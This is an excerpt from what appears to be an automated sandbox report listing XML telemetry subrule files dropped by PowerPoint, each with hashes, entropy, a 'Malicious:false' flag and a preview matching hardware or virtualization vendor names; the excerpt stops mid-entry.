                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="120615" V="0" DC="SM" T="Subrule" xmlns="">.. <S>.. <R T="1" R="120613" />.. <SR T="2" R="([Aa][Ss][Uu][Ss])">.. <S T="1" F="1" M="Ignore" />.. </SR>.. </S>.. <C T="W" I="0" O="true">.. <S T="2" F="Matched" M="Ignore" />.. </C>.. <C T="W" I="1" O="false">.. <S T="1" F="1" M="Ignore" />.. </C>.. <T>.. <S T="1" />.. </T>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):485
                                                                                                                              Entropy (8bit):4.281880348798365
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHdCbi09/T/qNOm/hFsNX/c//bLMpONyuCK0NOjsu:2dE9ryeiWu
                                                                                                                              MD5:334B45B484EF7619670897201178FF58
                                                                                                                              SHA1:92674C780644457811D5C0748A7E6CF17A394F43
                                                                                                                              SHA-256:8502269A6109E7711E54421F93715711FED5F5E74F1BA6D5157E78915DAFD734
                                                                                                                              SHA-512:09E6EC5C530580ED452119A5BAE9C14416568CF988FDB1632473DE03ABAB49830E437F5EABD9CA2CFAFDFFE8E8C041DC0DD3B09F4D9397DA7E982548995D8D76
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="120616" V="0" DC="SM" T="Subrule" xmlns="">.. <S>.. <R T="1" R="120615" />.. <TH T="2">.. <O T="EQ">.. <L>.. <U T="EqualsNull">.. <S T="1" F="0" M="Ignore" />.. </U>.. </L>.. <R>.. <V V="false" T="B" />.. </R>.. </O>.. </TH>.. </S>.. <C T="W" I="0" O="false">.. <V V="ASUSTek COMPUTER INC." T="W" />.. </C>.. <T>.. <S T="2" />.. </T>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):474
                                                                                                                              Entropy (8bit):4.242917853424237
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHdjbi00fT/qNOm/hFsNX/c//bLMpONyupNOjsu:2d1ayeiWB
                                                                                                                              MD5:B19BDD7E42D575E46883717A50AA3E7E
                                                                                                                              SHA1:19B7504AFF0769AE6D6E041E7112DB67370E9E7E
                                                                                                                              SHA-256:0D7D953A7528B80C23AAE758A033AA030DD5A810E25FE6EBD3BF10D5AB6AB902
                                                                                                                              SHA-512:888B2B4F6B8A5201C1BB68DF65DD020DD248DD73C6EEBACD21E6B43D0F23FABDB02E4B2FC153291C405729EAD4CECB2D7625B32DA8F129CF14E9F0F990BD4376
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="120646" V="0" DC="SM" T="Subrule" xmlns="">.. <S>.. <R T="1" R="120645" />.. <TH T="2">.. <O T="EQ">.. <L>.. <U T="EqualsNull">.. <S T="1" F="0" M="Ignore" />.. </U>.. </L>.. <R>.. <V V="false" T="B" />.. </R>.. </O>.. </TH>.. </S>.. <C T="W" I="0" O="false">.. <V V="Amazon EC2" T="W" />.. </C>.. <T>.. <S T="2" />.. </T>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):447
                                                                                                                              Entropy (8bit):4.822977286433141
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:6:TMVBd7Mrbi00uSEUq+G+7N5o+F0/HJSPeEdsV7C/5YHM9ndtq+/vJ9NOn2sby:TMHd4bi00fG+NgoU4DspS5ndrvNO2su
                                                                                                                              MD5:E83F63B14A2EA144C0BAEE761B558035
                                                                                                                              SHA1:7C8966F696D9CFB6E207E1AF49DE87840F8C5955
                                                                                                                              SHA-256:C7AB1D8055D48AADA457034C6AA388BAF7ECFD645D9A4DB0B7CEF68F75056237
                                                                                                                              SHA-512:36EEA746A12C311B1CE1813EE7C74D035D8F259AC7EB16C2CE068574ED78DEC6E503284EFCA456340FB5869B626736E732C799DD954D14290CB09F79F52B7922
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="120647" V="0" DC="SM" T="Subrule" xmlns="">.. <S>.. <R T="1" R="120645" />.. <SR T="2" R="([Aa][Pp][Aa][Cc][Hh][Ee] [Ss][Oo][Ff][Tt][Ww][Aa][Rr][Ee])">.. <S T="1" F="1" M="Ignore" />.. </SR>.. </S>.. <C T="W" I="0" O="true">.. <S T="2" F="Matched" M="Ignore" />.. </C>.. <C T="W" I="1" O="false">.. <S T="1" F="1" M="Ignore" />.. </C>.. <T>.. <S T="1" />.. </T>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):490
                                                                                                                              Entropy (8bit):4.336439364850335
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHdhbi04T/qNOm/hFsNX/c//bLMpONyugLLKNOjsu:2dbUyeiWxl
                                                                                                                              MD5:78F1691BB705D39901D63A21F709A7D8
                                                                                                                              SHA1:E53EF3006A4C4417CF4153BBA83491D4F26CA5F2
                                                                                                                              SHA-256:0822E3264AADBC30AD7D40C2C36BD4ABEAD1A56E5B5FE8B655F9965B5EAD6834
                                                                                                                              SHA-512:CA52A3AD7436C286A878A5BF07F3D7420510A0EA4E3B9AEAC9F506893CEE11FC1A7E322A2A06F95977ECECA5CCA72D19A876A46B4DC94486C98D8BB99ED56603
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="120648" V="0" DC="SM" T="Subrule" xmlns="">.. <S>.. <R T="1" R="120647" />.. <TH T="2">.. <O T="EQ">.. <L>.. <U T="EqualsNull">.. <S T="1" F="0" M="Ignore" />.. </U>.. </L>.. <R>.. <V V="false" T="B" />.. </R>.. </O>.. </TH>.. </S>.. <C T="W" I="0" O="false">.. <V V="Apache Software Foundation" T="W" />.. </C>.. <T>.. <S T="2" />.. </T>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):415
                                                                                                                              Entropy (8bit):4.708166014987959
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:6:TMVBd7eJY4bi0SfmAN/pqH/HJSPeEdsV7C/5YHM9ndtq+/vJ9NOn2sby:TMHdCrbi04mAN/pU4DspS5ndrvNO2su
                                                                                                                              MD5:BC9E42B9A99F058C7B3170BD17FE6D2A
                                                                                                                              SHA1:A32457536F4A6FD802E7F2D1040725E11CCBE243
                                                                                                                              SHA-256:A9B18AB2FEDA77C6F9DE4DDCEDF4901FBD7E0B1C80F016D67F8D55B4705432BD
                                                                                                                              SHA-512:44CE4B6A3B5D1044AE876CF2D541F720BFAF61D9AAD6FE78738FD59F3D0D203004DBFFA0F201BCF7A0BB9D00B3E09AB2DCC633AAEEA713F741F1CAF735C191DB
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="120649" V="0" DC="SM" T="Subrule" xmlns="">.. <S>.. <R T="1" R="120647" />.. <SR T="2" R="^([Ff][Ee][Dd][Oo][Rr][Aa])">.. <S T="1" F="1" M="Ignore" />.. </SR>.. </S>.. <C T="W" I="0" O="true">.. <S T="2" F="Matched" M="Ignore" />.. </C>.. <C T="W" I="1" O="false">.. <S T="1" F="1" M="Ignore" />.. </C>.. <T>.. <S T="1" />.. </T>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):478
                                                                                                                              Entropy (8bit):4.271258224632099
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHdvYbi0YfT/qNOm/hFsNX/c//bLMpONyuvNOjsu:2dKYLyeiWr
                                                                                                                              MD5:B080B4F31D24832210050A0126DE2375
                                                                                                                              SHA1:53A1147DEE8667765B7E909C332FCAE31009DD72
                                                                                                                              SHA-256:A39959229CA246F51B29DBBF1869018534980C7A42302CF7ACB1728C49FAC781
                                                                                                                              SHA-512:643E4506764AD4B649E5C414C49B2620B6DB119936FE220C7519A4BF9B84625761F3FEA0EED86D2ECF1D21E4D96747677A8868CB7B329DB4F68D1238048C7A2E
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="120650" V="0" DC="SM" T="Subrule" xmlns="">.. <S>.. <R T="1" R="120649" />.. <TH T="2">.. <O T="EQ">.. <L>.. <U T="EqualsNull">.. <S T="1" F="0" M="Ignore" />.. </U>.. </L>.. <R>.. <V V="false" T="B" />.. </R>.. </O>.. </TH>.. </S>.. <C T="W" I="0" O="false">.. <V V="Fedora Project" T="W" />.. </C>.. <T>.. <S T="2" />.. </T>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):414
                                                                                                                              Entropy (8bit):4.692996362198924
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:6:TMVBd7+ULbi0Yfpbf4p/HJSPeEdsV7C/5YHM9ndtq+/vJ9NOn2sby:TMHd3Lbi0YfC4DspS5ndrvNO2su
                                                                                                                              MD5:AD8027EE582EC74CD5F7CAB0CB6D7EC7
                                                                                                                              SHA1:3C6DD7A985E65379659E91BC4BA960EB73221AD6
                                                                                                                              SHA-256:28943F1B43815E9580C0D9ACA2919FB5CCF02E0DBD01E1A5E69836DDF8AF880B
                                                                                                                              SHA-512:7DEBDAB161639A537FAA8040561719A5B73F68E86716B9614C9C5043EDF2027FDBB4F412EB44F4A72BA936E3BDE9DA41BBBABDACAF2CF9A971EE5FD15F1C45A7
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="120651" V="0" DC="SM" T="Subrule" xmlns="">.. <S>.. <R T="1" R="120649" />.. <SR T="2" R="([Gg][Oo][Oo][Gg][Ll][Ee])">.. <S T="1" F="1" M="Ignore" />.. </SR>.. </S>.. <C T="W" I="0" O="true">.. <S T="2" F="Matched" M="Ignore" />.. </C>.. <C T="W" I="1" O="false">.. <S T="1" F="1" M="Ignore" />.. </C>.. <T>.. <S T="1" />.. </T>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):470
                                                                                                                              Entropy (8bit):4.2089329821017705
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHdSbi0l/T/qNOm/hFsNX/c//bLMpONyublKNOjsu:2dUlryeiWYl
                                                                                                                              MD5:0BC50B7C4F04174F769738A4FBD1F6BD
                                                                                                                              SHA1:30F4DD9CED236135AC1D8536E95F35C0C3124BDD
                                                                                                                              SHA-256:D78F1070801506EA7EE61D157BBAC8731A7CC4BA05DC7E32CFCA8435B63B6F15
                                                                                                                              SHA-512:D6A2350B173235AB598BB78165313408572DB9B524907A5FAED9036BC03C2F3F19C256A0E1F22F2B44B28D3EC8493735839AAA8917041A8097195E8EBACD0207
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="120652" V="0" DC="SM" T="Subrule" xmlns="">.. <S>.. <R T="1" R="120651" />.. <TH T="2">.. <O T="EQ">.. <L>.. <U T="EqualsNull">.. <S T="1" F="0" M="Ignore" />.. </U>.. </L>.. <R>.. <V V="false" T="B" />.. </R>.. </O>.. </TH>.. </S>.. <C T="W" I="0" O="false">.. <V V="Google" T="W" />.. </C>.. <T>.. <S T="2" />.. </T>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):418
                                                                                                                              Entropy (8bit):4.707441332702557
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:6:TMVBd7+WlzZbi0cU/txde+iH/HJSPeEdsV7C/5YHM9ndtq+/vJ9NOn2sby:TMHdjZbi0l/tx0+if4DspS5ndrvNO2su
                                                                                                                              MD5:5248BF652511D9BCCE0BA286DCC65C81
                                                                                                                              SHA1:E82239EA7EC5F71D754BC08354048177101BA015
                                                                                                                              SHA-256:ADA1BBF488324F9465B40D4783D24AC20111C4D3370474BABCC811D9E678484D
                                                                                                                              SHA-512:2A350872D1AF6A2D6145643EA978A11DAB1813BF2F3EDD9E254CFF17ACC7ADBCC8DCF3A28556A7754A678D2DDFFD6C55BD7BF40E9A3236C6947356C184560738
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="120653" V="0" DC="SM" T="Subrule" xmlns="">.. <S>.. <R T="1" R="120651" />.. <SR T="2" R="([Ii][Nn][Nn][Oo][Tt][Ee][Kk])">.. <S T="1" F="1" M="Ignore" />.. </SR>.. </S>.. <C T="W" I="0" O="true">.. <S T="2" F="Matched" M="Ignore" />.. </C>.. <C T="W" I="1" O="false">.. <S T="1" F="1" M="Ignore" />.. </C>.. <T>.. <S T="1" />.. </T>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):476
                                                                                                                              Entropy (8bit):4.2639253454828845
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHdcNbi0/T/qNOm/hFsNX/c//bLMpONyuNNOjsu:2d2ryeiW5
                                                                                                                              MD5:74D872EA16DF03506D214F0862DBBDE3
                                                                                                                              SHA1:B28FB5CA2D214A1BEA17E4E8CA33EC18B85A9D2A
                                                                                                                              SHA-256:D4B330CC22D526E5DF442E4BFB9FA4BA3FB78C9E472E26A97A20B79B3E997FFF
                                                                                                                              SHA-512:80173D696448A339E9FDE45813886F091D3224F4DD80244AA69F22C5C8FC70E7BA0104BA8EB963BB30635ED4509EEA0FC644C49E98D829D94CA670F7A36A2F0B
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="120654" V="0" DC="SM" T="Subrule" xmlns="">.. <S>.. <R T="1" R="120653" />.. <TH T="2">.. <O T="EQ">.. <L>.. <U T="EqualsNull">.. <S T="1" F="0" M="Ignore" />.. </U>.. </L>.. <R>.. <V V="false" T="B" />.. </R>.. </O>.. </TH>.. </S>.. <C T="W" I="0" O="false">.. <V V="innotek GmbH" T="W" />.. </C>.. <T>.. <S T="2" />.. </T>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):418
                                                                                                                              Entropy (8bit):4.719055574263021
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:6:TMVBd7+QLbi0cWlNA09RrC/HJSPeEdsV7C/5YHM9ndtq+/vJ9NOn2sby:TMHdzLbi0/AA04DspS5ndrvNO2su
                                                                                                                              MD5:4589ED351E39681CC16D932D3F00E043
                                                                                                                              SHA1:3F78108447DF75252CDE358C9A7B76F77567ABE3
                                                                                                                              SHA-256:3DD9187F700156092C092BC4F0CE9FD591EB3B148E472F2FD6E150A63679355A
                                                                                                                              SHA-512:79347B7D7558E94AFB3D505B61482902E2BC28F90CFB21F99865F298C3703B2FDE2B7AA22AD737AC3E2384307B2E4240753558DD5279207A4DC2E0668F8B38A1
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="120655" V="0" DC="SM" T="Subrule" xmlns="">.. <S>.. <R T="1" R="120653" />.. <SR T="2" R="([Nn][Ii][Mm][Bb][Oo][Xx][Xx])">.. <S T="1" F="1" M="Ignore" />.. </SR>.. </S>.. <C T="W" I="0" O="true">.. <S T="2" F="Matched" M="Ignore" />.. </C>.. <C T="W" I="1" O="false">.. <S T="1" F="1" M="Ignore" />.. </C>.. <T>.. <S T="1" />.. </T>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):476
                                                                                                                              Entropy (8bit):4.247714040651271
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHdWbi0h/T/qNOm/hFsNX/c//bLMpONyu8NOjsu:2dAByeiWW
                                                                                                                              MD5:E9BE600B1629FB86977739F79E522855
                                                                                                                              SHA1:E8FE8DA9AF7554E24472781536AF73AB4AB5E848
                                                                                                                              SHA-256:D405F8DFA42BAF113F7D75FF2650DC97AA67D6C9101CDB28C34B564C79713BA7
                                                                                                                              SHA-512:1CD43ABD8160FBDED875F2601DD27899D4BE685D6CCC8271F880F2296B8660670E711345CAEC0A43C40EBF3C99F263BFE6B069EB724C6F6523364963F927B002
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="120656" V="0" DC="SM" T="Subrule" xmlns="">.. <S>.. <R T="1" R="120655" />.. <TH T="2">.. <O T="EQ">.. <L>.. <U T="EqualsNull">.. <S T="1" F="0" M="Ignore" />.. </U>.. </L>.. <R>.. <V V="false" T="B" />.. </R>.. </O>.. </TH>.. </S>.. <C T="W" I="0" O="false">.. <V V="Nimboxx Inc." T="W" />.. </C>.. <T>.. <S T="2" />.. </T>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):418
                                                                                                                              Entropy (8bit):4.717740715102454
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:6:TMVBd7+SLbi0cQ/cwXfn7C/HJSPeEdsV7C/5YHM9ndtq+/vJ9NOn2sby:TMHdxbi0h/cwvu4DspS5ndrvNO2su
                                                                                                                              MD5:F0AD1492A6C44F24EA5948EBE21A6EEC
                                                                                                                              SHA1:CE9B6CF27C5858386804C9AF8422D5EBCE7F8A09
                                                                                                                              SHA-256:AABBCFC63506C7DA9091B8CAC522A7E5410662D7B2ECADB28F291C7D71BFB4B4
                                                                                                                              SHA-512:D09B79738C85CABD4B0E13132774A1092709EE599DE5DDD522D9B4B8D44BFA4C66358CDDDD0AC002F60AA3E2CAF97CFB0D4A8D9874DB7554319C9023398D177C
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="120657" V="0" DC="SM" T="Subrule" xmlns="">.. <S>.. <R T="1" R="120655" />.. <SR T="2" R="([Nn][Uu][Tt][Aa][Nn][Ii][Xx])">.. <S T="1" F="1" M="Ignore" />.. </SR>.. </S>.. <C T="W" I="0" O="true">.. <S T="2" F="Matched" M="Ignore" />.. </C>.. <C T="W" I="1" O="false">.. <S T="1" F="1" M="Ignore" />.. </C>.. <T>.. <S T="1" />.. </T>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):471
                                                                                                                              Entropy (8bit):4.228778217940084
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHdIbi0zT/qNOm/hFsNX/c//bLMpONyuPY1NOjsu:2dyPyeiWZ8
                                                                                                                              MD5:13A32A5095B4B723741BF367FDF2C6F1
                                                                                                                              SHA1:5824783B0D6852BAEB81B7C46CCFCB8B631AD9E1
                                                                                                                              SHA-256:E165302F8BC925034B7EC362326E1662B8B98A694A83B9DE7E6D8EB57873FB51
                                                                                                                              SHA-512:F14725F392E7FFA6C2716E8542F032CA04410421ECEC4BA2D85C451731F5E52966FE6C7DA24FC3C02EB2E3A8E55D449DDA2D65A92819A17C3BB34B8B6DAC9014
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="120658" V="0" DC="SM" T="Subrule" xmlns="">.. <S>.. <R T="1" R="120657" />.. <TH T="2">.. <O T="EQ">.. <L>.. <U T="EqualsNull">.. <S T="1" F="0" M="Ignore" />.. </U>.. </L>.. <R>.. <V V="false" T="B" />.. </R>.. </O>.. </TH>.. </S>.. <C T="W" I="0" O="false">.. <V V="Nutanix" T="W" />.. </C>.. <T>.. <S T="2" />.. </T>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):467
                                                                                                                              Entropy (8bit):4.8714291926289155
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:6:TMVBd7+clzZbi0cS/ZhM+x4OTSivmO4aMp/HJSPeEdsV7C/5YHM9ndtq+/vJ9NOQ:TMHd/Lbi0zMYRL/Bg4DspS5ndrvNO2su
                                                                                                                              MD5:E88110ADF90C4E766B2DF19C87D43A7C
                                                                                                                              SHA1:D2EC11B7076E6B36B77A0D9A23D3474DEB963B00
                                                                                                                              SHA-256:91112D57084BE41D76797D1684A4E8D175099465C8110B203403C3A9C47DB32E
                                                                                                                              SHA-512:ABA5DB1FE2D2BDECF8B1B20B3A1E06E0CF3430DEC7EA20F606318A17153307AF182A0AD07AE4DEB7DDDA472FE993D72056056A0128FC9A2AA953A79789DD3F3D
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="120659" V="0" DC="SM" T="Subrule" xmlns="">.. <S>.. <R T="1" R="120657" />.. <SR T="2" R="([Oo][Pp][Ee][Nn][Ss][Tt][Aa][Cc][Kk] [Ff][Oo][Uu][Nn][Dd][Aa][Tt][Ii][Oo][Nn])">.. <S T="1" F="1" M="Ignore" />.. </SR>.. </S>.. <C T="W" I="0" O="true">.. <S T="2" F="Matched" M="Ignore" />.. </C>.. <C T="W" I="1" O="false">.. <S T="1" F="1" M="Ignore" />.. </C>.. <T>.. <S T="1" />.. </T>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):484
                                                                                                                              Entropy (8bit):4.296339986640134
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHdC4bi0t/T/qNOm/hFsNX/c//bLMpONyuYCimKNOjsu:2dCitryeiWTCiml
                                                                                                                              MD5:01C9D68421183B1C2627CD66E8ABF65F
                                                                                                                              SHA1:9DA726F692A04BB6D47344543D1854C9D2AE4573
                                                                                                                              SHA-256:30BBD2B7869B3F7AA3953118BB3B2DFE4C30B1979FE60A0A0C57917871F951BD
                                                                                                                              SHA-512:85E76A243F53D7B44074777CF28E43174ED3FEC1C36962167400C10BEF2CBE5E6ACC91BF749760DDE502F35275897E8EC6ABF7AC9B466344D0CBDF25BF602412
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="120660" V="0" DC="SM" T="Subrule" xmlns="">.. <S>.. <R T="1" R="120659" />.. <TH T="2">.. <O T="EQ">.. <L>.. <U T="EqualsNull">.. <S T="1" F="0" M="Ignore" />.. </U>.. </L>.. <R>.. <V V="false" T="B" />.. </R>.. </O>.. </TH>.. </S>.. <C T="W" I="0" O="false">.. <V V="OpenStack Foundation" T="W" />.. </C>.. <T>.. <S T="2" />.. </T>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):410
                                                                                                                              Entropy (8bit):4.646408713691851
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:6:TMVBd7f4bi0cclNZFI/HJSPeEdsV7C/5YHM9ndtq+/vJ9NOn2sby:TMHdr4bi0t/E4DspS5ndrvNO2su
                                                                                                                              MD5:2D65473C614D1268DF2EA60EFB643897
                                                                                                                              SHA1:772F3DAE5ADCAEB273ED3A7AD6F6593ADBDDD730
                                                                                                                              SHA-256:0779CA4DBF3100D51E9567AA7546F15D11A5C3B2FCE9715F63AD0453A70B214C
                                                                                                                              SHA-512:C11251F9FA6EF43957B7150D3940D502B523A3B3AADB529280059BCC7A673BBD4090C19AC7735FDC32F6189A2181D707F47EA424505B5FBE6F8861467FBADE32
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="120661" V="0" DC="SM" T="Subrule" xmlns="">.. <S>.. <R T="1" R="120659" />.. <SR T="2" R="([Oo][Vv][Ii][Rr][Tt])">.. <S T="1" F="1" M="Ignore" />.. </SR>.. </S>.. <C T="W" I="0" O="true">.. <S T="2" F="Matched" M="Ignore" />.. </C>.. <C T="W" I="1" O="false">.. <S T="1" F="1" M="Ignore" />.. </C>.. <T>.. <S T="1" />.. </T>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):469
                                                                                                                              Entropy (8bit):4.194064506144483
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHdiYbi0sT/qNOm/hFsNX/c//bLMpONyu1NOjsu:2d7YyeiW3
                                                                                                                              MD5:2CC750D02C6EAF952125F6E6D7F7BB98
                                                                                                                              SHA1:A3EBB2B065B4E26C9AC8C37740F66D7843514579
                                                                                                                              SHA-256:FD74E64FF498ADFC38B6AE08AD9A798D324CC1C3DAC3A0BEE85224F11B6361DB
                                                                                                                              SHA-512:CF2B15C479825A10B7D6EF2B2A14F6A26BFF007632606C0C59BD918CA4737F2AB510110F10672FC908291C022A38FB12C17D93820E218098B7DDE9B07CB70D67
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="120662" V="0" DC="SM" T="Subrule" xmlns="">.. <S>.. <R T="1" R="120661" />.. <TH T="2">.. <O T="EQ">.. <L>.. <U T="EqualsNull">.. <S T="1" F="0" M="Ignore" />.. </U>.. </L>.. <R>.. <V V="false" T="B" />.. </R>.. </O>.. </TH>.. </S>.. <C T="W" I="0" O="false">.. <V V="oVirt" T="W" />.. </C>.. <T>.. <S T="2" />.. </T>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):426
                                                                                                                              Entropy (8bit):4.7392703636081
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:6:TMVBd7Sbi0snIRIo+NF2+zF4WA/HJSPeEdsV7C/5YHM9ndtq+/vJ9NOn2sby:TMHdmbi0s2gFZPA4DspS5ndrvNO2su
                                                                                                                              MD5:4390F647CB7FEC8C2CE2C78107BDFAE1
                                                                                                                              SHA1:EBF65EC154A9235FF2A322D37AC44B27A34231FA
                                                                                                                              SHA-256:FE0E93D944C17F4B45E9C6A87DC5830BE5E9B2FF3CA96F695582C500C2F72306
                                                                                                                              SHA-512:D4AF7868AF8FF8B76262281751FEBE750F239E4523F5DFB75A177682BCAE98BE9C3ADC42294B5309C8D01885E3FC6678828F494B6685A665553E1B00AD396482
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="120663" V="0" DC="SM" T="Subrule" xmlns="">.. <S>.. <R T="1" R="120661" />.. <SR T="2" R="([Pp][Aa][Rr][Aa][Ll][Ll][Ee][Ll][Ss])">.. <S T="1" F="1" M="Ignore" />.. </SR>.. </S>.. <C T="W" I="0" O="true">.. <S T="2" F="Matched" M="Ignore" />.. </C>.. <C T="W" I="1" O="false">.. <S T="1" F="1" M="Ignore" />.. </C>.. <T>.. <S T="1" />.. </T>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):501
                                                                                                                              Entropy (8bit):4.344663057090138
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHdrbi0rST/qNOm/hFsNX/c//bLMpONyucU2NOjsu:2dtOyeiWUx
                                                                                                                              MD5:6A8CA81E31901B83B19A8020B04C80E8
                                                                                                                              SHA1:2210F1C09691EA735817ED6F8E7A46BCBAB5B2F8
